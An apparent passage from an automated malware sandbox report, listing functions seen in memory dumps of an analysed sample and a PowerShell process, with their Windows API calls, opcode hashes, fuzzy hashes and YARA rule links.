APIs

GetCurrentProcess.KERNEL32 ref: 025F6AB0
GetCurrentThread.KERNEL32 ref: 025F6AED
GetCurrentProcess.KERNEL32 ref: 025F6B2A
GetCurrentThreadId.KERNEL32 ref: 025F6B83

Memory Dump Source

Source File: 00000000.00000002.216924669.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: b2acb8e6b3d367de9cb7d2764d334190e39b2967eb721dd21b3085e36db40c2a
Instruction ID: 663237c4b7e09fcc96cba6c92da6f20a31615615b4b6ff64e165bf1d876c8b26
Opcode Fuzzy Hash: b2acb8e6b3d367de9cb7d2764d334190e39b2967eb721dd21b3085e36db40c2a
Instruction Fuzzy Hash: F05157B09006498FDB54DFA9D648BDEBBF4FF48314F208499E119A7350E735A844CF65

Uniqueness

Uniqueness Score: -1.00%

Function 025FBA50, Relevance: 1.7, APIs: 1, Instructions: 199COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 025FBCA6

Memory Dump Source

Source File: 00000000.00000002.216924669.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: ce16af6e18fc9631b37053a0b6054f8b2b409e2fe070767bcd459c7dcb20e73c
Instruction ID: 757bb42ca9df16fff1f8cd044d175419f6f2bb5d4061578ec1daa51ac07cbcb5
Opcode Fuzzy Hash: ce16af6e18fc9631b37053a0b6054f8b2b409e2fe070767bcd459c7dcb20e73c
Instruction Fuzzy Hash: 5C712570A00B058FD764DF2AD55176ABBF1FF88218F00892DE68AD7A40EB35E905CF95

Uniqueness

Uniqueness Score: -1.00%

Function 025FDF0D, Relevance: 1.6, APIs: 1, Instructions: 115COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 025FE02A

Memory Dump Source

Source File: 00000000.00000002.216924669.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 216e2f743eef234094101506ee51b6d2c7a706eca308a97741ea057e60d25ef7
Instruction ID: 4ef12de4f7eb04804206eb325e79fd233bd4f11832d2f76b7b137d940e775581
Opcode Fuzzy Hash: 216e2f743eef234094101506ee51b6d2c7a706eca308a97741ea057e60d25ef7
Instruction Fuzzy Hash: C351C0B1D003089FDB14CF99D884ADEBFB5FF48314F25852AE919AB210D7749985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 025FDF18, Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 025FE02A

Memory Dump Source

Source File: 00000000.00000002.216924669.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: e796d8fad65a339e6b116447b60df749d6d7d2e7836d38e76fe34f10f51ef959
Instruction ID: 49d5c435824f62b48a6edd8293fa1225065d04b0502c206289a6bd0c2c32fca9
Opcode Fuzzy Hash: e796d8fad65a339e6b116447b60df749d6d7d2e7836d38e76fe34f10f51ef959
Instruction Fuzzy Hash: 7A41CFB1D003089FDB14CF99D884ADEBFB5BF48314F24852AE919AB210D7749945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 025F7009, Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 025F7107

Memory Dump Source

Source File: 00000000.00000002.216924669.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 79ad5b5b6f31459581479aaa70526e5c5997ad0abc11b2382c71f3618d107aa3
Instruction ID: 1f759629427c604f389ae25aa3b70614ccaeb2c73e148e33ff8c74b39a74ef3b
Opcode Fuzzy Hash: 79ad5b5b6f31459581479aaa70526e5c5997ad0abc11b2382c71f3618d107aa3
Instruction Fuzzy Hash: B7415A76900258AFCB01CF99D844AEEBFF5FB48320F15805AEA04A7311D3359955DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 025F7078, Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 025F7107

Memory Dump Source

Source File: 00000000.00000002.216924669.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 0c8fcd3047a7072e72e44b0e84624f91f3a5012efe899230e6666ddb6a8b0925
Instruction ID: 877e17a063be7f3a6b1856703473b6b94788cd3d2c97f671c2653a4a02d8bf81
Opcode Fuzzy Hash: 0c8fcd3047a7072e72e44b0e84624f91f3a5012efe899230e6666ddb6a8b0925
Instruction Fuzzy Hash: A621FFB59002089FDB10DFA9D984ADEBBF8FF48324F14841AE914A7310D378A944CF60

Uniqueness

Uniqueness Score: -1.00%

Function 025F7080, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 025F7107

Memory Dump Source

Source File: 00000000.00000002.216924669.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 19a8674244796fb4cf5ac278daab02dbb9f91ff613ea3254601f101d9b63591a
Instruction ID: 486510f183b45e3c28b04e8bd69f97323f7963c7720051e5418bf8b7bcd73d8f
Opcode Fuzzy Hash: 19a8674244796fb4cf5ac278daab02dbb9f91ff613ea3254601f101d9b63591a
Instruction Fuzzy Hash: 0F21E4B59002489FDB10CFAAD984ADEFFF8FB48324F14841AE914A3350D374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 025FA998, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,025FBD21,00000800,00000000,00000000), ref: 025FBF32

Memory Dump Source

Source File: 00000000.00000002.216924669.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6e4124333ea9b798650e938cfcd4a5ce12a5131a57ec6239beb062ccb83360d0
Instruction ID: 27b8b2bc7a383351ae98212ce4c06acd8dd0a8af6e766906991b0f4e80aadf14
Opcode Fuzzy Hash: 6e4124333ea9b798650e938cfcd4a5ce12a5131a57ec6239beb062ccb83360d0
Instruction Fuzzy Hash: DD1114B2904248DFCB10DF9AD444ADEFBF4FB48328F15842AE515A7640C375A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 025FBEC0, Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,025FBD21,00000800,00000000,00000000), ref: 025FBF32

Memory Dump Source

Source File: 00000000.00000002.216924669.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 14472aebb9a85349b39c0e7130eb0b19bf93a700640a159b1d8f741ee672cba1
Instruction ID: b980cc9a8a995a89da5af066136145dad84bde794c9127d53367e80c40c543c4
Opcode Fuzzy Hash: 14472aebb9a85349b39c0e7130eb0b19bf93a700640a159b1d8f741ee672cba1
Instruction Fuzzy Hash: 011103B6900249CFCB10DF9AD544ADEFBF4BB48328F15855AE515A7700C374A549CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 025FBC40, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 025FBCA6

Memory Dump Source

Source File: 00000000.00000002.216924669.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: aec04db59475075cd6a96c4b0ba6e8529898f3063381c612b951136ddfb7085b
Instruction ID: 291344460f4f429b830fd849a63a1f2fb424632e3b516ed7793878414f27bea8
Opcode Fuzzy Hash: aec04db59475075cd6a96c4b0ba6e8529898f3063381c612b951136ddfb7085b
Instruction Fuzzy Hash: 501102B1C002498FCB10DF9AD444ADFFBF8AB89224F10841AD519B7600D375A546CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 025FE160, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 025FE1BD

Memory Dump Source

Source File: 00000000.00000002.216924669.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: f0eb8343b6c956c42c1173b7e6682878ec3d5fe0a0f9d05d22403be984697037
Instruction ID: bd6f55b068fdbf3c5a9bd5c464c808b3500dca94cc81f971aab2f2fd7ae9110a
Opcode Fuzzy Hash: f0eb8343b6c956c42c1173b7e6682878ec3d5fe0a0f9d05d22403be984697037
Instruction Fuzzy Hash: 4A1103B59002489FDB10DF9AD985BDEFBF8FB48324F10841AE915A3340C374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 025FE159, Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 025FE1BD

Memory Dump Source

Source File: 00000000.00000002.216924669.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 6dce0494419e46a2710cbe5bd2a16ee5184dcbf557ec6ce09c402a14cfd77b0d
Instruction ID: e8dba6a78d1bead6d13ef32b93b485b4236882c8de77571af3b641b79907280d
Opcode Fuzzy Hash: 6dce0494419e46a2710cbe5bd2a16ee5184dcbf557ec6ce09c402a14cfd77b0d
Instruction Fuzzy Hash: D71103B5900209CFDB10DF99D584BDEBBF8FB88324F20845AD919A3740C378A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B9D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.216726770.0000000000B9D000.00000040.00000001.sdmp, Offset: 00B9D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 623db8b2a750c7f92a3f4de70bf959383c1d5c5c2a699529d1d958932a0a4537
Instruction ID: 4fa94e507a157ca98b498d5df372914084bb1eb5d7f72e517b0f14528976a338
Opcode Fuzzy Hash: 623db8b2a750c7f92a3f4de70bf959383c1d5c5c2a699529d1d958932a0a4537
Instruction Fuzzy Hash: 7521D071608240DFDF14DF24D9D4B26BBA5FB88314F24C5B9E90A4B246C73AD846CA61

Uniqueness

Uniqueness Score: -1.00%

Function 00B9D006, Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.216726770.0000000000B9D000.00000040.00000001.sdmp, Offset: 00B9D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbff615f56b83da94b6616cbcc0393c57b5488fb845a89a3444411aaf0ff17f1
Instruction ID: c2fc70197f5a2cb85892dfb87f01130142ae533b0df36552e6bdf512fd09501b
Opcode Fuzzy Hash: bbff615f56b83da94b6616cbcc0393c57b5488fb845a89a3444411aaf0ff17f1
Instruction Fuzzy Hash: B021C6755093808FCB02CF20D5A0B15BFB1FB46314F28C5EAD8498B697C33AD80ACB62

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 025FF838, Relevance: .6, Instructions: 624COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.216924669.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4bdc530f8f11bf97d78550910845973252b9be6b7cc280115fc41a1190a5be0
Instruction ID: 024f78cc3d5dba1b5a68cb7e1b013db8f91acf9c586ca664113b3aabb2f309a3
Opcode Fuzzy Hash: c4bdc530f8f11bf97d78550910845973252b9be6b7cc280115fc41a1190a5be0
Instruction Fuzzy Hash: F922E436B042118FCB65DF38C494A6E7BA2BF85308B1A4469D606CBFE2DB34DC41C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 025FC148, Relevance: .5, Instructions: 522COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.216924669.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 952f7e20c466bc420aa4d9cbba60ad577a025202fcc5ff194cfb43184366c7ca
Instruction ID: 1e95949847d4ee0270b20b00bba77af93b3c8a93aebe40c997ca193a582c6b9a
Opcode Fuzzy Hash: 952f7e20c466bc420aa4d9cbba60ad577a025202fcc5ff194cfb43184366c7ca
Instruction Fuzzy Hash: 49527BB1D40B468BD738CF14E48929D3BB1FB40329BD26A19D6526B6D0D3B464EECF48

Uniqueness

Uniqueness Score: -1.00%

Function 025FA758, Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.216924669.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f527c6241646029ae9c72a5a5f945fb863673a7351138584bc67bded0fc368cf
Instruction ID: fda0252c5a01e37dd0793c4d796f6042eee7c2621b0cc9e9b69410489c57ffea
Opcode Fuzzy Hash: f527c6241646029ae9c72a5a5f945fb863673a7351138584bc67bded0fc368cf
Instruction Fuzzy Hash: A8A16032E0061ACFCF15DFB5C84459EBBB2FF89304B15856AE905AB220EB75E955CF80

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exe PID: 6856 Parent PID: 6316 powershell.exeCOMMON

Executed Functions

Function 00C93840, Relevance: 3.8, Strings: 2, Instructions: 1286COMMON

Download Yara Rule

Strings

C=, xrefs: 00C93999, 00C9399E
3=, xrefs: 00C938B7, 00C938BC

Memory Dump Source

Source File: 0000000A.00000002.400937206.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID: 3=$C=
API String ID: 0-3866686857
Opcode ID: 293e27fba6f966588437a7d9c6ddd09299481ac5281520cb4240ca4d42b9b658
Instruction ID: 2641c1b2e51fa5cfd082c3bccb917d7b6668924b21450e32c3270a2d5c1e5846
Opcode Fuzzy Hash: 293e27fba6f966588437a7d9c6ddd09299481ac5281520cb4240ca4d42b9b658
Instruction Fuzzy Hash: 19D2A074E002698FDB65DF69C895BAEB7F6BB48304F1081E9E50DA7350DB34AE818F50

Uniqueness

Uniqueness Score: -1.00%

Function 00C41DA8, Relevance: 1.3, Instructions: 1309COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400419440.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 918e553a63cbe52bcc7476611d2ed86381a6be5a296d29f52d058c4da8eeae0f
Instruction ID: e33a1ab385a37cd6d14291c5964f2d502c4e531dc16b075fbcf9849284a12f34
Opcode Fuzzy Hash: 918e553a63cbe52bcc7476611d2ed86381a6be5a296d29f52d058c4da8eeae0f
Instruction Fuzzy Hash: 71C238747006008FCB28DF28D598A6EB7B2FF89314B654998E556DB372CB31ED45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00C4EDA0, Relevance: .6, Instructions: 617COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400419440.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84a2bfd18366c98488f3ac8addfd2ea9e22016944679cb788ad884565c8010bb
Instruction ID: c42a74c571fd542bcdf19e1e840f8d74492c795d41d4df5cfab519b39098103b
Opcode Fuzzy Hash: 84a2bfd18366c98488f3ac8addfd2ea9e22016944679cb788ad884565c8010bb
Instruction Fuzzy Hash: 92325B74B002088FDB24EB75C895A6EB7B2BF88304F118469E51ADB395DF74ED42CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00C43148, Relevance: .6, Instructions: 593COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400419440.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa0a56afc619b3a1f4a2564eb1fed4aeb9037853cee1f9781cf27a4520543342
Instruction ID: a06a632b5075c20a4ae32869e2783a8119dde33b0935932d766f71b2b8dc1481
Opcode Fuzzy Hash: fa0a56afc619b3a1f4a2564eb1fed4aeb9037853cee1f9781cf27a4520543342
Instruction Fuzzy Hash: 0B320674700A408FCB28DF68C59896EB7B2FF89714B264998E556DB371CB30EE45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00C481C8, Relevance: .4, Instructions: 428COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400419440.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e122c0ea36ee1cd823cc46c12596bc9b6bdd4fcf20d85226e650a098c7db59f
Instruction ID: d3aac2eecbc30ab8560533a99ba6c11606bf64841de8b9d51f0919963666063c
Opcode Fuzzy Hash: 4e122c0ea36ee1cd823cc46c12596bc9b6bdd4fcf20d85226e650a098c7db59f
Instruction Fuzzy Hash: 26F18D34A042188FDB24DF65C855BAEB7B2FF88308F118468E90AAB791DF74ED45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00C40040, Relevance: .5, Instructions: 469COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400419440.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c7df322e37ca1121c091788814a833fe7244e22e4405d588821cb926b503aa6
Instruction ID: 50dc5c0e4836eba3cc582700873aedd90a37cff781989d5cc1f17c7e6ca6f796
Opcode Fuzzy Hash: 6c7df322e37ca1121c091788814a833fe7244e22e4405d588821cb926b503aa6
Instruction Fuzzy Hash: EE027B30A002449FDB14EBB4D894BAE77B2FF85304F128479E505AB3A1DF35AD06CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C9AA38, Relevance: .4, Instructions: 427COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400937206.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 652d0eb08f1c442fc0459ce7bec2f0ecbf506a70acec4ac002e1c653d98f1bb6
Instruction ID: 79dddb98d9b4a4b5c2e2710ccd5a55504f8f95c8eb428b1517605ff5e359c307
Opcode Fuzzy Hash: 652d0eb08f1c442fc0459ce7bec2f0ecbf506a70acec4ac002e1c653d98f1bb6
Instruction Fuzzy Hash: 0EE17F757002449FCB18EB69C454A6E76E6EFC9314F16847CE60ADB3A5CF74DC028BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C9AFC0, Relevance: .3, Instructions: 335COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400937206.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 431e35324a89779b0a48f96c879380e4bbe8923ff85dbf9a397c8c3459df038c
Instruction ID: 2146abef7903be5957dfea60e3ede69fc993d075509e305aadd044fd19999b40
Opcode Fuzzy Hash: 431e35324a89779b0a48f96c879380e4bbe8923ff85dbf9a397c8c3459df038c
Instruction Fuzzy Hash: EAC17C70B00254AFDF14EF65D998AAEB7F6AF89300F258469E9169B3A0DF30DD01DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00C46700, Relevance: .3, Instructions: 299COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400419440.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3110a8f5ea6e730cd541cf8cbca52dbe5b87a70c84102aea222b462a202c19c1
Instruction ID: d5eca4eea576af23761d75946a0f71810f5b2ef491e8f9d70db2e1f208532966
Opcode Fuzzy Hash: 3110a8f5ea6e730cd541cf8cbca52dbe5b87a70c84102aea222b462a202c19c1
Instruction Fuzzy Hash: A9D11934A00214CFDB24CF64C994B99BBB2FF89304F24C1A9D449AB396DB719D86CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00C473B8, Relevance: .3, Instructions: 271COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400419440.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe99202c9e5d90beda1b1906254a275c5b13fff57bb23e498c1fbadf20c0015d
Instruction ID: 1cebd1e2593699212125f8adbf9f29b2b24e1fd3422f85db50e6aeaea80821c2
Opcode Fuzzy Hash: fe99202c9e5d90beda1b1906254a275c5b13fff57bb23e498c1fbadf20c0015d
Instruction Fuzzy Hash: 26A18330B042558FCB14EBA5D954AADB7F2FFC8304F61852CD506AB795DF349D068B90

Uniqueness

Uniqueness Score: -1.00%

Function 00C43888, Relevance: .2, Instructions: 246COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400419440.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63d027107f76f6c4a154724318c2c11e66ec88f6a7fa954f8010b41a3d5a57aa
Instruction ID: cd1a3b39caaa4cd9e27e2373026c76fba9563145623186b2bcee8838e4e70da2
Opcode Fuzzy Hash: 63d027107f76f6c4a154724318c2c11e66ec88f6a7fa954f8010b41a3d5a57aa
Instruction Fuzzy Hash: 1581EF307092448FC714AB29D85462EBBE6FFC9714B15487EE506CB795DF34DD028B91

Uniqueness

Uniqueness Score: -1.00%

Function 00C473B4, Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400419440.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53fc51bc3838038314d2d891f84e33109caa4948ebe76dc8bdafaa1048c150a9
Instruction ID: 602dc9774fc368ad23dd3f3824c783069f168061b1f13bfdd72de80eb27e2b07
Opcode Fuzzy Hash: 53fc51bc3838038314d2d891f84e33109caa4948ebe76dc8bdafaa1048c150a9
Instruction Fuzzy Hash: 62917330A042199FCB14DFA9C994A9DBBF2FFC8304F618568D405AB795DB70AD06CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00C92370, Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400937206.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9ca7064b37de517b87196dd7ecbc0205c41902a45f6972de8546a5622533d8f
Instruction ID: f4b23737f46fdc97a248cdddfe8a95d649a7cd4d851f24792825eada1b5a1c1f
Opcode Fuzzy Hash: a9ca7064b37de517b87196dd7ecbc0205c41902a45f6972de8546a5622533d8f
Instruction Fuzzy Hash: F3A15730A04249AFCB00EF65D890EADBBB2FF49304F1689A8E555AB361D730ED41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00C40006, Relevance: .2, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400419440.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: febe7c3fe6607c781f52e72fbc0c5684c1f5d6eecb12cb202753de36142cd87f
Instruction ID: ce1b12d6929a148223fbda1848a4373b91b38161de90ce434f512e6c86239cb8
Opcode Fuzzy Hash: febe7c3fe6607c781f52e72fbc0c5684c1f5d6eecb12cb202753de36142cd87f
Instruction Fuzzy Hash: 86717D306042459FCB10EF68D884A997BF1FF49304F1685AAE605DF6B2DB70ED05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C44C9B, Relevance: .2, Instructions: 195COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400419440.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c11af7fdbd960b5c5f4035aa5c6a2977c6c41408f4fb0025f76dd55481bc8ecf
Instruction ID: 5ea6d602d82e9dc7268062299f3d58b79505cfed6a70808ecbab89608a56ca53
Opcode Fuzzy Hash: c11af7fdbd960b5c5f4035aa5c6a2977c6c41408f4fb0025f76dd55481bc8ecf
Instruction Fuzzy Hash: DB711B74B141088FCB18EB69E855AAEBBB7FFC8314F158429E506D7395CF74AC418BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C44CA0, Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400419440.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 628455dce6b0970af19081b61ec7ba6ef0fd1585bd370bb3d35d75ab8184e318
Instruction ID: bf328ee4f96db32e114ac141f307187482381084019a22009bcd6b35824aa222
Opcode Fuzzy Hash: 628455dce6b0970af19081b61ec7ba6ef0fd1585bd370bb3d35d75ab8184e318
Instruction Fuzzy Hash: C7711C74B141088FCB18EB69E855AAEBBB7FFC8314F158429E506D7395CF74AC418BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C40143, Relevance: .2, Instructions: 177COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400419440.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d81eac51a9d1d311a90d95ed106f11853531f7db99e940d18e9744662a4f086
Instruction ID: 917a5c324cc94a28f55edd39bd5de7445acfd8c23b1dc70e1dadcefa27a908d1
Opcode Fuzzy Hash: 1d81eac51a9d1d311a90d95ed106f11853531f7db99e940d18e9744662a4f086
Instruction Fuzzy Hash: 9E613D307406058FCB14EF79D494A6DB3E2BF89308B128569E616DB7B1DB70ED04CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C98C2E, Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400937206.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eccf46fe12ad92de434a8dae304dc20f5b6227776360c9a8d9b2cdbf9c6b3582
Instruction ID: 48b76a27b0960353a4069f1173f72474b45d039cc5dd48aba0b1853d261e7712
Opcode Fuzzy Hash: eccf46fe12ad92de434a8dae304dc20f5b6227776360c9a8d9b2cdbf9c6b3582
Instruction Fuzzy Hash: 4E61BC35A042058FCB05CF58C884AAEFBB1FF4A310F1581A9E555DB3A2CB35EC46CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C481C4, Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400419440.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 130d84d13cbb974bdbe86a19a7467ee6bc10c6b9b4825f0ec74174d0314dde85
Instruction ID: 373db301e09917eb22bfd18ed0adc25e1f97e57cc6ff1e5f651575f0508215e6
Opcode Fuzzy Hash: 130d84d13cbb974bdbe86a19a7467ee6bc10c6b9b4825f0ec74174d0314dde85
Instruction Fuzzy Hash: 91519231A043498BDB24CF66C4416AEBBF2BF85704F258529D415ABB91EF74AD49CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00C4AE50, Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400419440.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8b5d6307fbf86c1a1f47783cd176ab46ce7b9c5e01ae80dceb6048a0c6d9c34
Instruction ID: 4d90d999f2a44586cbd32189e2565d834c0680830bad5e212e4edd2749f45855
Opcode Fuzzy Hash: d8b5d6307fbf86c1a1f47783cd176ab46ce7b9c5e01ae80dceb6048a0c6d9c34
Instruction Fuzzy Hash: 435138B4A40209CFDB14CF99C484AAEBBF2FF88310F258459E815AB352D735ED45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C466FB, Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400419440.0000000000C40000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f753cae5f612a1f0b6c09985e5d76d5debd325c12ab56ba8191865b3eba4fc5f
Instruction ID: 6bf40825b0c95dd525dad183d0d56e5ece62e774c508085f12e9d54611bbbe74
Opcode Fuzzy Hash: f753cae5f612a1f0b6c09985e5d76d5debd325c12ab56ba8191865b3eba4fc5f
Instruction Fuzzy Hash: C8515874A00258CFCB24CF65C980A9DBBF2BF89304F2481A9D459EB395DB319E46CF52

Uniqueness

Uniqueness Score: -1.00%

Function 00C932A8, Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.400937206.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

